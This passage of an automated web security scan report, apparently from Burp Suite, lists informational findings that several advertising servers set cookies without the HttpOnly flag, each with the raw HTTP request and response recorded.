1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!e
a!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!!w[/!79C8S3FdY; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!#!2t)f!!!!#=3f<!"; path=/; expires=Thu, 05-Sep-2013 12:48:10 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=79ea9bbe-d886-11e0-97e0-78e7d1fa057c&_hmacv=1&_salt=4168856251&_keyid=k1&_hmac=ad550835999ed68f54bf7c02c64a09ed5b35b47e; path=/; expires=Thu, 06-Oct-2011 12:48:10 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:10 GMT
Pragma: no-cache
Content-Length: 954
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGlUdtyokAQ.Zl92soyw1yYMdQ8DBcVceSiRPFli2DEICwqbGny9csuWSvv6Zc-3V19TvVpHZujHO0JYQiNaIb4CzV1jPBLzmHOjQdomiZjFDNM-mrjJ46c2gt
...[SNIP]...

10.27. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1291642&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#A!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v
<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:24:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#B!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!$=3f*7!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:24:25 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=mn2ICOXBzQMQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:24:25 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


10.28. http://ads.bridgetrack.com/site/rtgt.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /site/rtgt.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/rtgt.asp?BU=163&ref=http%3A//www.fairpoint.com/&p=http%3A//www.fairpoint.com/residential/&r=0.612211185041815&PostalCode=05874 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; BTASES=SID=7E5654075C924D7888A472B3499F867A; BTA163=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Mon, 05 Sep 2011 12:52:29 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA163=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; expires=Fri, 31-Aug-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=7E5654075C924D7888A472B3499F867A; path=/
Set-Cookie: BTA=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; expires=Fri, 31-Aug-2012 04:00:00 GMT; path=/
Date: Tue, 06 Sep 2011 12:52:28 GMT
Connection: close
Content-Length: 0


10.29. http://ads.lucidmedia.com/clicksense/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=100842&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:02 GMT
Expires: Tue, 06 Sep 2011 11:59:03 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh19/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Wed, 05-Sep-2012 11:59:03 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Connection: close


10.30. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a27-19737-91675470-1315313420; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.31. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a27-15590-1471898671-1315313420; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.32. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a24-24085-1374961686-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.33. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

10.34. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...

10.35. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

